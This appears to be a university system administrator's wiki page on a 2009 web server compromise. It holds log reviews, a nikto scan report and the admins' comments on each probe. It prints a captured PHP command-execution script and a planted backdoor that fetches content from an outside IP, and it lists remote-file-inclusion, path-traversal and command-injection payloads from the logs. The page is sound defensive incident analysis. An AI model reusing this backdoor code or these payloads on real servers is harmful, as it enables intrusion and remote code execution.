aoe:webserverhack
Table of Contents
attempts on the new server
attempts at bouncing off of server
logwatch clue:
404 errors:
/news.php?_SERVER[DOCUMENT_ROOT]=http://ww ... ote_log/ec.txt?: 1 Time(s)
[root@bacchus httpd]# grep 'ote_log/ec.txt' * access_log.1:217.117.85.108 - - [10/May/2009:00:01:10 -0400] "GET /news/news.php?_SERVER[DOCUMENT_ROOT]=http://www.ionthenet.co.kr/note_log/ec.txt? HTTP/1.1" 200 22071 access_log.1:217.117.85.108 - - [10/May/2009:00:01:10 -0400] "GET /news.php?_SERVER[DOCUMENT_ROOT]=http://www.ionthenet.co.kr/note_log/ec.txt? HTTP/1.1" 404 5275
ec.txt
<?php
echo "Mic22";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;
hacked files on old server
Need to check ./hps-html/vids/thumbs/index.php
[root@bacchus www]find . -user apache -iname index.php -exec ls -Flat {} \;
-rwxrw-r-- 1 apache web-admin 3008 Jul 13 2005 ./aoe-html/computing/faq/index.php*
-rw-rw-r-- 1 apache web-admin 1302 Aug 23 2005 ./aoe-html/computing/manuals/index.php
-rwxrw-r-- 1 apache web-admin 1162 Aug 23 2005 ./aoe-html/computing/index.php*
-rw-r--r-- 1 apache apache 18126 Nov 29 2006 ./aoe-html/organizations/vtsgt/delete this folder/index.php
-rwxrwxr-x 1 apache web-admin 3038 Jan 23 2006 ./aoe-html/research/facilities/dyppir/index.php*
-rw-r--r-- 1 apache apache 168 Apr 15 03:07 ./hps-html/vids/thumbs/index.php
-rwxrw-r-- 1 apache web-admin 2272 Jan 31 2006 ./secure-html/computing/online/index.php*
[root@bacchus www]# cat ./hps-html/vids/thumbs/index.php
<?php
error_reporting(0);
if (isset($_GET["p"])){
$zipfile = file_get_contents("http://72.9.108.202/doors/vt01/canadian/".$_GET["p"].".html");
echo $zipfile;
}
?>
files dropped in these locations which were writeable by apache
www.sssl.aoe.vt.edu/documentation/hardware_components/top www.sssl.aoe.vt.edu/simplePHPblog/ www.aoe.vt.edu/organizations/aiaa/lutze www.aoe.vt.edu/organizations/vtsgt
nikto report
[root@traininglt nikto]# ./nikto.pl -host 128.173.188.87
- Nikto v2.03/2.04
---------------------------------------------------------------------------
+ Target IP: 128.173.188.87
+ Target Hostname: bacchus.ipv4.aoe.vt.edu
+ Target Port: 80
+ Start Time: 2009-05-12 15:34:28
---------------------------------------------------------------------------
+ Server: Apache/2.2.3 (Scientific Linux)
- /robots.txt - contains 3 'disallow' entries which should be manually viewed. (GET)
+ No CGI Directories found (use '-C all' to force check all possible dirs)
- Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-877: HTTP method ('Allow' Header): 'TRACE' is typically only used for debugging and should be disabled. This message does not mean it is vulnerable to XST.
+ OSVDB-0: Retrieved X-Powered-By header: PHP/5.1.6
+ OSVDB-0: ETag header found on server, inode: 32375282, size: 111, mtime: 0xb976d0c0
+ Apache/2.2.3 appears to be outdated (current is at least Apache/2.2.9). Apache 1.3.39 and 2.0.61 are also current.
+ OSVDB-637: GET /~root - Enumeration of users is possible by requesting ~username (responds with 'Forbidden' for users, 'not found' for non-existent users).
+ OSVDB-0: GET /index.php?module=My_eGallery : My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection.
+ OSVDB-877: TRACE / : TRACE option appears to allow XSS or credential theft. See http://www.cgisecurity.com/whitehat-mirror/WhitePaper_screen.pdf for details
+ OSVDB-12184: GET /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 : PHP reveals potentially sensitive information via certain HTTP requests which contain specific QUERY strings.
+ OSVDB-3092: GET /phpmyadmin/ : phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3092: GET /phpMyAdmin/ : phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3093: GET /index.php?base=test%20 : This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: GET /index.php?IDAdmin=test : This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: GET /index.php?pymembs=admin : This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: GET /index.php?SqlQuery=test%20 : This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: GET /index.php?tampon=test%20 : This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: GET /index.php?topic=&lt;script&gt;alert(document.cookie)&lt;/script&gt;%20 : This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3268: GET /icons/ : Directory indexing is enabled: /icons
+ OSVDB-3233: GET /icons/README : Apache default file found.
+ 3577 items checked: 20 item(s) reported on remote host
+ End Time: 2009-05-12 15:35:07 (39 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Test Options: -host 128.173.188.87
--------------------------------------------------------------------------
WWW2
[root@webtest ~]# grep "sciencedirect" /var/log/httpd/* /var/log/httpd/access_log.3:218.246.113.84 - - [25/Apr/2009:05:24:19 -0400] "GET http://www.sciencedirect.com/ HTTP/1.1" 200 25042 "-" "Mozilla/5.0 (compatible; MSIE 5.01; Win2000)" /var/log/httpd/access_log.4:58.252.189.17 - - [16/Apr/2009:09:56:03 -0400] "GET http://www.sciencedirect.com/science/subscriptionSummary/4875/J HTTP/1.1" 404 328 "-" "Mozilla/5.0 (compatible; MSIE 5.01; Win2000)" /var/log/httpd/access_log.4:219.231.151.44 - - [18/Apr/2009:05:36:10 -0400] "GET http://www.sciencedirect.com/ HTTP/1.1" 200 25068 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" *Above appears to be an attempt to use us as a proxy to get to sciencedirect.com, which may filter by ip address, and our address would allow accemss because it is a Virginia Tech Libraries resource **Reccomended Action: block URI requests via mod_rewrite in htaccess I can't answer your root question, but here's a band-aid (requires mod_rewrite): RewriteEngine on RewriteRule ^/?http:// - [F] This will send a 403-Forbidden response for any request for "http://" or "/http://" followed by any URI. "GET /phpMyAdmin-2.6.1-rc2/main.php HTTP/1.0" 404 316 "-" "-" *These are ok to ignore, phpMyAdmin is installed but only accessible to us "SEARCH /\x90\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\...\x90\x90\x90\x90... *This was an attempt to attack via an IIS vulnerability, no worries here, we're not using a windows based web server "GET /thisdoesnotexistahaha.php HTTP/1.1" *This is an attempt to get the type of webserver and OS being used *Solution: > Why don't you create a file with that name, or at least a redirect > statement in httpd.conf, that redirects the request to > "yesitdoeshehe.php". ;) % cat > yesitdoeshehe.php #!/bin/bash echo 'Content-type: text/plain' echo echo These are not the PHP scripts you are looking for. exit 0 ^D % chmod +x yesitdoeshehe.php "GET /xmlrpc.php HTTP/1.0" ; "GET /*/main.php" *Attempt to exploit an xmlphp vulnerability via remote sql injection *We're safe here, fixed in php 5.0.5 and we're on 5.1.6
May 10, 2009 Log Analysis
Bacchus 05/10/2009 Log Review ============================= 80.179.24.50 /index.php?inc=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP Response 200 An attempt to read the /proc/self/environ file, fails, does nothing but take the user to the main page. ///skin/zero_vote/login.php?dir=http://fst ... ditors/id.txt??: 1 Time(s) I cannot tell what this one is doing, unable to find any information other than reports of others having this entry in their logs as well **Keep an eye on this one until we know what it does //favorites.php?nuke_bb_root_path=http://h ... age/img/image??: 1 Time(s) Vulnerability in PhP Nuke Platform, we don't use this. //templates/beez/index.php?act=http://www. ... /v6id.txt??????: 1 Time(s) Again, can't find any relevatin information to this entry **Keep a watch on it /MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=4518 ... MVER=4&CAPREQ=0 Harmless, used by IE to determine if Office Server Extensions are enabled /_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=4518 ... MVER=4&CAPREQ=0 Something to do with Exchange 2003, don't think this concerns us but keep a watch out for it again /academics/?PHPSESSID=6df789551664bd593103f8ccb27191c5 Traces back to google, perhpas its crawler? Actually its the same IP and PHPSESSID for each entry in the log where this occurs, leads me to believe it is the Google crawler /alumni/alumnilist.php?class=http://144.20 ... 666/index.html? ...No clue, traces back to amsterdam /alumni/main/at/?continental-airline-tickets-3/: 1 Time(s) /alumni/main/at/?last-minute-airline-tickets-3/: 1 Time(s) **IP traces back to Yahoo, possbly it's crawler?** /awstats.pl?configdir=%7Cecho%20;echo%20;i ... o%20;echo%20%7C We dont appear to use awstats /calendars/windtunnel/index.php?PHPSESSID= ... on=comment1%2C+: 20 Time(s) /calendars/windtunnel/index.php?PHPSESSID= ... on=comment2%2C+: 8 Time(s) /calendars/windtunnel/index.php?PHPSESSID= ... on=comment3%2C+: 20 Time(s) /calendars/windtunnel/index.php?PHPSESSID= ... on=comment4%2C+: 11 Time(s) /calendars/windtunnel/index.php?PHPSESSID= ... on=comment5%2C+: 20 Time(s) /calendars/windtunnel/index.php?PHPSESSID= ... on=comment6%2C+: 12 Time(s) **No idea, tracing back to Amsterdam, all returning 404's /cgi-bin/acart/acart.pl?&page=%7Cuname%20-a;pwd;id%7C Hard to find information, however it is a known exploit (php injection), worth looking into. *When adding files back, check if they're cgi. /cgi-bin/awstats.pl?configdir=%7Cecho%20;e ... o%20;echo%20%7C Again with awstats, need to check if we do have it /cgi-bin/index.cgi?page=%7Cuname%20-a;id%7C: 1 Time(s) Again back to Amsterdam /cgi-bin/kerbynet?Section=NoAuthREQ&Action ... ype=*%22;id;%22: 1 Time(s) Amsterdam again, Allows remote execution of code on ZeroShell ***Go through and check for all cgi occurences, foreign hits on many of them*** /errors.php?error=http://www.ayj.ca/buggsbunny?? Unsure, traces back to Amsterdam, Latin America /horde/services/help/?show=about&module=;% ... thru(%22id%22); Attempted attack on a mail system, we don't use it /labsupport/labequipment.php?selfimageresi ... e=400&ysize=200 Don't think this is anything to worry about, looks like just trying to load images onto a page that are resized by a php script /organizations/aiaa/index.php?go=calendar/ ... o/pics/id.txt?? Looks normal after all. /organizations/index.php?inc=../../../../. ... oc/self/environ: 1 Time(s) /organizations/index.php?inc=../../../../. ... self/environ%00: 1 Time(s) Trying to access the environ file again, still didn't work /organizations/sname/ingalls02pics/plas%25 ... 2520cutting.jpg: 2 Time(s) Look normal after all /organizations/vtsgt/index.php?inc=../../. ... oc/self/environ: 1 Time(s) Again a failure /people/include/vtweb_html_1.12/assets/js/widgets.js: 81 Time(s) Just a bug in our code /saffairs/pages/s/?free-credit-score-no-credit-card-3/: 1 Time(s) Yahoo! crawler, intereseting hit though /services/help/?show=about&module=;%22.passthru(%22id%22); Amsterdam again. Another horde attempt, we don't use it, so no worries here. /twiki/bin/configure?action=image;image=%7Cid%7C;type=text Amsterdam.
May 13, 2009 Log Analysis
404's
/%7eyongkm/java/thin/: 1 Time(s) 79.23.132.70 - - [12/May/2009:21:05:42 -0400] "GET /%7eyongkm/java/thin/ HTTP/1.1" 404 6624 [stedwar1@hephaistos ~]$ host 79.23.132.70 70.132.23.79.in-addr.arpa domain name pointer host70-132-dynamic.23-79-r.retail.telecomitalia.it.
///skin/zero_vote/ask_password.php?dir=htt ... schmasik.txt???: 2 Time(s) 210.118.194.200 - - [12/May/2009:05:34:28 -0400] "GET /~mason/Mason_f/747CONF.INP%20///skin/zero_vote/ask_password.php?dir=http://203.253.145.192/zb41//skin/zero_vote/ruschmasik.txt??? HTTP/1.1" 404 5311 210.118.194.200 - - [12/May/2009:05:34:28 -0400] "GET ///skin/zero_vote/ask_password.php?dir=http://203.253.145.192/zb41//skin/zero_vote/ruschmasik.txt??? HTTP/1.1" 404 5271 210.118.194.200 - - [12/May/2009:05:34:28 -0400] "GET /~mason/Mason_f///skin/zero_vote/ask_password.php?dir=http://203.253.145.192/zb41//skin/zero_vote/ruschmasik.txt??? HTTP/1.1" 404 5247
//DOCUMENT_ROOT=http://irc.harazuku.co.cc/ ... sponz/id2.txt??: 4 Time(s) 199.120.90.222 - - [12/May/2009:12:55:14 -0400] "GET /~cwoolsey/Courses/AOE3134/Supplemental/RootLocusTechnique.pdf//DOCUMENT_ROOT=http://irc.harazuku.co.cc/2002/.sh/responz/id2.txt?? HTTP/1.1" 404 5297
//ee_commerce/paypalcart.php?toroot=http:/ ... /cms//uiu.txt??: 3 Time(s)
//gmapfactory/params.php?gszAppPath=http:/ ... alog/safe1.txt?: 1 Time(s)
//skin/zero_vote/error.php?%20dir=http://l ... .mw.lt/id.txt??: 1 Time(s)
//skin/zero_vote/setup.php?%20dir=http://d ... wap.sh/id.txt??: 2 Time(s)
//sources/join.php?FORM[url]=owned&CONFIG[ ... /vip/id2.txt???: 1 Time(s)
//surveys/survey.inc.php?path=http://www.r ... %20%20/id.txt??: 1 Time(s)
/3DLDV/wb23000/data.html: 1 Time(s)
/MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=4518 ... MVER=4&CAPREQ=0: 1 Time(s)
/MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=6403 ... MVER=4&CAPREQ=0: 1 Time(s)
/MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=8164 ... MVER=4&CAPREQ=0: 2 Time(s)
/_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=4518 ... MVER=4&CAPREQ=0: 1 Time(s)
/_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=6403 ... MVER=4&CAPREQ=0: 1 Time(s)
/_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=8164 ... MVER=4&CAPREQ=0: 2 Time(s)
/_vti_bin/shtml.exe/_vti_rpc: 9 Time(s)
/_vti_inf.html: 9 Time(s)
/alumni/alumnilist.php?class=1983&PHPSESSI ... d54ef3dc75f883d: 1 Time(s)
/calendars/windtunnel/index.php?PHPSESSID= ... on=comment1%2C+: 7 Time(s)
/calendars/windtunnel/index.php?PHPSESSID= ... on=comment2%2C+: 9 Time(s)
/calendars/windtunnel/index.php?PHPSESSID= ... on=comment3%2C+: 8 Time(s)
/calendars/windtunnel/index.php?PHPSESSID= ... on=comment4%2C+: 7 Time(s)
/calendars/windtunnel/index.php?PHPSESSID= ... on=comment5%2C+: 9 Time(s)
/calendars/windtunnel/index.php?PHPSESSID= ... on=comment6%2C+: 17 Time(s)
/cgi-bin/mt/mt-comments.cgi: 6 Time(s)
/cgi-bin/mt/mt-comments.cgi?entry_id=1329: 1 Time(s)
/cgi-bin/mt/mt-comments.cgi?entry_id=1330: 1 Time(s)
/cgi-bin/mt/mt-comments.cgi?entry_id=1331: 2 Time(s)
/cgi-bin/mt/mt-comments.cgi?entry_id=699: 1 Time(s)
/cgi-bin/mt/mt-tb.cgi?__mode=view&entry_id=1329: 1 Time(s)
/cgi-bin/mt/mt-tb.cgi?__mode=view&entry_id=1330: 1 Time(s)
/cgi-bin/mt/mt-tb.cgi?__mode=view&entry_id=1331: 1 Time(s)
/classes/aoe3054/: 2 Time(s)
/classes/aoe3054?PHPSESSID=1939caa884433834315b4a00b6e35ac0: 1 Time(s)
/classes/aoe3054?PHPSESSID=1c7615b28cf141183322809db94ce0a4: 1 Time(s)
/classes/aoe3054?PHPSESSID=7916107b13fccab81eb4211c633deccf: 1 Time(s)
/classes/aoe3054?PHPSESSID=981a9739aad37ad1536582db69788eae: 1 Time(s)
/cms/components/com_joomlaboard/faq.php: 1 Time(s)
/cms/components/com_mamboboard/faq.php: 1 Time(s)
/components/com_joomlaboard/faq.php: 1 Time(s)
/components/com_mamboboard/faq.php: 1 Time(s)
/computing/: 2 Time(s)
/computing/faq/displayfaq.php?area_id=3: 1 Time(s)
/computing/faq/displayfaq.php?area_id=6: 1 Time(s)
/password.php?skin_board_path=http://www.i ... /upload/ec.txt?: 1 Time(s)
/people.html: 1 Time(s)
/people/bgfac.html: 3 Time(s)
/people/clifffac.html: 1 Time(s)
/people/davenfac.html: 2 Time(s)
/people/include/vtweb_html_1.12/assets/js/widgets.js: 1 Time(s)
/people/josfac.html: 2 Time(s)
/people/masfac.html: 5 Time(s)
/people/robfac.html: 1 Time(s)
/research/?area_id=2: 1 Time(s)
/research/?area_id=3: 1 Time(s)
/research/?area_id=4: 1 Time(s)
/research/?area_id=6: 1 Time(s)
/research/thesis/?mode=area_selected&thesis_area=3: 1 Time(s)
/research/thesis/?mode=area_selected&thesis_area=4: 1 Time(s)
/research/thesis/?mode=area_selected&thesis_area=6: 1 Time(s)
/research/thesis/index.php?mode=area_selected&thesis_area=2: 1 Time(s)
/research/thesis/index.php?mode=area_selected&thesis_area=3: 1 Time(s)
/research/thesis/index.php?mode=area_selected&thesis_area=5: 1 Time(s)
/research/thesis/index.php?mode=area_selected&thesis_area=6: 1 Time(s)
/saffairs/pages/r/?canada-free-credit-report-2/: 1 Time(s)
/shop/locale/?Aarp-health-insurance-5/: 1 Time(s)
/site/components/com_joomlaboard/faq.php: 1 Time(s)
/site/components/com_mamboboard/faq.php: 1 Time(s)
/usr/local/lib/netscape/docs/images/poweredsgi.GIF: 2 Time(s)
/wordtrans/wordtrans.php: 1 Time(s)
/~cwoolsey//ee_commerce/paypalcart.php?tor ... /cms//uiu.txt??: 3 Time(s)
/~cwoolsey/Advisees//ee_commerce/paypalcar ... /cms//uiu.txt??: 3 Time(s)
/~cwoolsey/Advisees/Undergraduate//ee_comm ... /cms//uiu.txt??: 3 Time(s)
/~cwoolsey/Advisees/Undergraduate/FaruqueA ... /cms//uiu.txt??: 3 Time(s)
/~cwoolsey/Courses/3104: 1 Time(s)
/~cwoolsey/Courses/AOE3034/index_files/editdata.mso: 1 Time(s)
/~cwoolsey/Courses/AOE3134/Supplemental//D ... sponz/id2.txt??: 4 Time(s)
/~cwoolsey/Courses/AOE3134/Supplemental/Ro ... sponz/id2.txt??: 4 Time(s)
/~dare/me/punk/rocker.html: 1 Time(s)
/~grasmeye/photos/allison/billstory.html: 1 Time(s)
/~gurdal/Public/COURSES/4084-Docs/..%5C408 ... CTutorial-09.nb: 1 Time(s)
/~gurdal/Public/COURSES/4084-Docs/..%5C408 ... WORK%5CHW03.pdf: 1 Time(s)
/~gurdal/Public/COURSES/5064-Docs/TUTORIALS/IPLamDes.nb: 1 Time(s)
/~gurdal/gurdal.gif: 2 Time(s)
/~hokiesat/Presentations_and_Papers/AFRL%2 ... orqueValues.pdf: 1 Time(s)
/~hokiesat/subs/software/ION-F%20Software% ... ation%20Set.doc: 1 Time(s)
/~hokiesat/subs/systems/HokieSatDocMatrix_files/oledata.mso: 1 Time(s)
/~hokiesat/subs/systems/ION-FMassSS.xls: 1 Time(s)
/~hokiesat/subs/wiring/New%20Stuff/Update% ... /upload/ec.txt?: 1 Time(s)
/~hokiesat/subs/wiring/New%20Stuff/passwor ... /upload/ec.txt?: 1 Time(s)
/~hokiesat/subs/wiring/password.php?skin_b ... /upload/ec.txt?: 1 Time(s)
/~grasmeye/photos/allison/billstory.html: 1 Time(s)
/~gurdal/Public/COURSES/4084-Docs/..%5C408 ... CTutorial-09.nb: 1 Time(s)
/~gurdal/Public/COURSES/4084-Docs/..%5C408 ... WORK%5CHW03.pdf: 1 Time(s)
/~gurdal/Public/COURSES/5064-Docs/TUTORIALS/IPLamDes.nb: 1 Time(s)
/~gurdal/gurdal.gif: 2 Time(s)
/~hokiesat/Presentations_and_Papers/AFRL%2 ... orqueValues.pdf: 1 Time(s)
/~hokiesat/subs/software/ION-F%20Software% ... ation%20Set.doc: 1 Time(s)
/~hokiesat/subs/systems/HokieSatDocMatrix_files/oledata.mso: 1 Time(s)
/~hokiesat/subs/systems/ION-FMassSS.xls: 1 Time(s)
/~hokiesat/subs/wiring/New%20Stuff/Update% ... /upload/ec.txt?: 1 Time(s)
/~hokiesat/subs/wiring/New%20Stuff/passwor ... /upload/ec.txt?: 1 Time(s)
/~hokiesat/subs/wiring/password.php?skin_b ... /upload/ec.txt?: 1 Time(s)
/~lscharf/scripts//surveys/survey.inc.php? ... %20%20/id.txt??: 1 Time(s)
/~mason//ee_commerce/paypalcart.php?toroot ... /cms//uiu.txt??: 3 Time(s)
/~mason//skin/zero_vote/error.php?%20dir=h ... .mw.lt/id.txt??: 1 Time(s)
/~mason//skin/zero_vote/setup.php?%20dir=h ... wap.sh/id.txt??: 2 Time(s)
/~mason/Mason//sources/join.php?FORM[url]= ... /vip/id2.txt???: 1 Time(s)
/~mason/Mason/ACiFlyWngs.html/: 1 Time(s)
/~mason/Mason/ACinfoTOC.html%22%20%20targe ... /vip/id2.txt???: 1 Time(s)
/~mason/Mason/ACinfoTOC.html//sources/join ... /vip/id2.txt???: 1 Time(s)
/~mason/Mason/http%20://www.aoe.vt.edu/~ma ... /ACinfoTOC.html: 1 Time(s)
/~mason/Mason_f/(null): 1 Time(s)
/~mason/Mason_f///skin/zero_vote/ask_passw ... schmasik.txt???: 2 Time(s)
/~mason/Mason_f//ee_commerce/paypalcart.ph ... /cms//uiu.txt??: 3 Time(s)
/~mason/Mason_f//skin/zero_vote/error.php? ... .mw.lt/id.txt??: 1 Time(s)
/~mason/Mason_f//skin/zero_vote/setup.php? ... wap.sh/id.txt??: 2 Time(s)
/~mason/Mason_f/747CONF.INP%20%20//skin/ze ... wap.sh/id.txt??: 1 Time(s)
/~mason/Mason_f/747CONF.INP%20///skin/zero ... schmasik.txt???: 2 Time(s)
/~mason/Mason_f/747CONF.INP//skin/zero_vot ... .mw.lt/id.txt??: 1 Time(s)
/~mason/Mason_f/747CONF.INP//skin/zero_vot ... wap.sh/id.txt??: 1 Time(s)
/~mason/Mason_f/CAtxtTop.html%0dCAtxtTop.html%20%a0%0dpaper.: 1 Time(s)
/~mason/Mason_f/M96SAE.pdf%20%20//skin/zer ... wap.sh/id.txt??: 1 Time(s)
/~mason/Mason_f/M96SAE.pdf//skin/zero_vote ... .mw.lt/id.txt??: 1 Time(s)
/~mason/Mason_f/M96SAE.pdf//skin/zero_vote ... wap.sh/id.txt??: 1 Time(s)
/~mason/Mason_f/M96SC02.pdf/: 1 Time(s)
/~mason/Mason_f/M96SC10.pdf%22%20%20lang=% ... _w/safe1.txt???: 2 Time(s)
/~mason/Mason_f/MorphFinalRptF03.pdf//ee_c ... /cms//uiu.txt??: 3 Time(s)
405 Method Not Allowed
/~mason/: 4 Time(s)
May 14, 2009 Log Analysis
A total of 5 sites probed the server
194.83.8.126 209.87.194.21 222.124.24.77 85.241.14.188 87.106.253.45
Requests with error response codes
400 Bad Request
/: 1 Time(s)
403 Forbidden
/: 7 Time(s)
/bannerimages/: 1 Time(s)
/bannerimages/campioli/thumb3.jpg: 1 Time(s)
/bannerimages/campioli/thumb5.jpg: 1 Time(s)
/bannerimages/caplab/thumb1.jpg: 2 Time(s)
/bannerimages/caplab/thumb2.jpg: 2 Time(s)
/bannerimages/caplab/thumb3.jpg: 1 Time(s)
/bannerimages/caplab/thumb4.jpg: 1 Time(s)
/bannerimages/caplab/thumb5.jpg: 1 Time(s)
/bannerimages/casper/thumb1.jpg: 1 Time(s)
/bannerimages/hpc/thumb5.jpg: 1 Time(s)
/bannerimages/ldv: 1 Time(s)
/bannerimages/ldv/ldv_full.jpg: 1 Time(s)
/bannerimages/ldv?PHPSESSID=1c7615b28cf141183322809db94ce0a4: 1 Time(s)
/bannerimages/ldv?PHPSESSID=22cc899a2ed407ea5541c6c32983a5bc: 1 Time(s)
/bannerimages/ldv?PHPSESSID=39009e253e4feede42a7520c2fcf3bb5: 1 Time(s)
/bannerimages/ldv?PHPSESSID=f859e1faff216a325754f18ce8f8fc42: 1 Time(s)
/bannerimages/nsl/iambus_www.jpg: 1 Time(s)
/bannerimages/orange_effect?PHPSESSID=4755 ... 633b481e5eecf69: 1 Time(s)
/bannerimages/orange_effect?PHPSESSID=9a26 ... e78794c0e442bb9: 1 Time(s)
/bannerimages/orange_effect?PHPSESSID=ff6c ... 3f3241c117c4568: 1 Time(s)
/bannerimages/phantom/thumb1.jpg: 2 Time(s)
/bannerimages/phantom/thumb2.jpg: 1 Time(s)
/bannerimages/phantom/thumb3.jpg: 1 Time(s)
/bannerimages/phantom/thumb4.jpg: 1 Time(s)
/bannerimages/sssl/hokiesat.jpg: 1 Time(s)
/bannerimages/tbw/lmas_full.jpg: 1 Time(s)
/bannerimages/tbw/lmas_www.jpg: 1 Time(s)
/bannerimages/volant/thumb1.jpg: 1 Time(s)
/bannerimages/volant?PHPSESSID=47a86f49197 ... 69d89baee522cef: 1 Time(s)
/bannerimages/volant?PHPSESSID=fe410b64284 ... 27088160dead814: 1 Time(s)
/bannerimages/vtsrp/ignition.jpg: 1 Time(s)
/bannerimages/vtsrp/offrail.jpg: 1 Time(s)
/bannerimages/vtsrp/thumb2.jpg: 1 Time(s)
/bannerimages/vtsrp/thumb3.jpg: 1 Time(s)
/classes/aoe3054?PHPSESSID=1c7615b28cf141183322809db94ce0a4: 1 Time(s)
/classes/aoe3054?PHPSESSID=4755f3e63308bb81f633b481e5eecf69: 1 Time(s)
/classes/aoe3054?PHPSESSID=6df789551664bd593103f8ccb27191c5: 1 Time(s)
/classes/aoe3054?PHPSESSID=7916107b13fccab81eb4211c633deccf: 1 Time(s)
/classes/aoe3054?PHPSESSID=a85cdd6ec52ddb3008600f78659ba4a8: 1 Time(s)
/favicon.ico: 2 Time(s)
/giving/: 1 Time(s)
/help: 1 Time(s)
/index.php: 1 Time(s)
/robots.txt: 38 Time(s)
/teststeve.txt: 1 Time(s)
/~cdhall/Research/RossIM/AAS03262.bbl: 1 Time(s)
/~cdhall/Research/aiaa.bst: 1 Time(s)
/~cdhall/Research/gyrostatsearch.doc: 1 Time(s)
/~cdhall/courses/exams/LagrangianPrime.aux: 1 Time(s)
/~cdhall/courses/exams/LagrangianPrime.bbl: 1 Time(s)
/~cdhall/courses/exams/LagrangianPrime.blg: 1 Time(s)
/~cdhall/courses/exams/LagrangianPrime.log: 1 Time(s)
/~cdhall/index_files/themedata.thmx: 1 Time(s)
404 Not Found
/%7Ejing/java/nsfapplets/css/css/backGifs/bk1.gif: 7 Time(s)
//admin.php?submit=submit&form_include_tem ... ars/simple.jpg?: 2 Time(s)
//ee_commerce/paypalcart.php?toroot=http:/ ... pyright.txt????: 1 Time(s)
//include/admin.lib.inc.php?site_path=http ... igen/.../ids???: 1 Time(s)
/MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=4518 ... MVER=4&CAPREQ=0: 1 Time(s)
/MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=6211 ... MVER=4&CAPREQ=0: 1 Time(s)
/MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=6551 ... MVER=4&CAPREQ=0: 4 Time(s)
/MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=8164 ... MVER=4&CAPREQ=0: 5 Time(s)
/_vti_bin/_vti_aut/author.dll: 1 Time(s)
/_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=4518 ... MVER=4&CAPREQ=0: 1 Time(s)
/_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=6211 ... MVER=4&CAPREQ=0: 1 Time(s)
/_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=6551 ... MVER=4&CAPREQ=0: 4 Time(s)
/_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=8164 ... MVER=4&CAPREQ=0: 5 Time(s)
/_vti_bin/shtml.exe/_vti_rpc: 7 Time(s)
/_vti_inf.html: 7 Time(s)
/alumni/alumnilist.php?class=1969: 1 Time(s)
/alumni/alumnilist.php?class=1971: 1 Time(s)
/alumni/alumnilist.php?class=1974: 1 Time(s)
/alumni/alumnilist.php?class=1976: 1 Time(s)
/alumni/alumnilist.php?class=1985: 1 Time(s)
/alumni/alumnilist.php?class=1986: 2 Time(s)
/alumni/alumnilist.php?class=1995: 1 Time(s)
/alumni/alumnilist.php?class=1997: 1 Time(s)
/alumni/alumnilist.php?class=2000: 1 Time(s)
/alumni/alumnilist.php?class=2001: 2 Time(s)
/alumni/alumnilist.php?class=2003: 1 Time(s)
/calendars/windtunnel/index.php?PHPSESSID= ... on=comment1%2C+: 10 Time(s)
/calendars/windtunnel/index.php?PHPSESSID= ... on=comment2%2C+: 22 Time(s)
/calendars/windtunnel/index.php?PHPSESSID= ... on=comment3%2C+: 13 Time(s)
/calendars/windtunnel/index.php?PHPSESSID= ... on=comment4%2C+: 20 Time(s)
/calendars/windtunnel/index.php?PHPSESSID= ... on=comment5%2C+: 11 Time(s)
/calendars/windtunnel/index.php?PHPSESSID= ... on=comment6%2C+: 12 Time(s)
/cgi-bin/mt/mt-comments.cgi: 2 Time(s)
/cgi-bin/mt/mt-comments.cgi?entry_id=1329: 1 Time(s)
/cgi-bin/mt/mt-comments.cgi?entry_id=216: 1 Time(s)
/cgi-bin/mt/mt-search.cgi?IncludeBlogs=2&search=powerpoint: 1 Time(s)
/cgi-bin/mt/mt-tb.cgi?__mode=view&entry_id=1329: 3 Time(s)
/cgi-bin/mt/mt-tb.cgi?__mode=view&entry_id=1331: 1 Time(s)
/design/hpa/spgm/index.php?spgmGal=Flight_ ... 22&spgmFilters=: 1 Time(s)
/design/hpa/spgm/index.php?spgmGal=Flight_ ... 29&spgmFilters=: 1 Time(s)
/design/hpa/spgm/index.php?spgmGal=Flight_ ... 40&spgmFilters=: 1 Time(s)
/design/hpa/spgm/index.php?spgmGal=Flight_ ... =0&spgmFilters=: 1 Time(s)
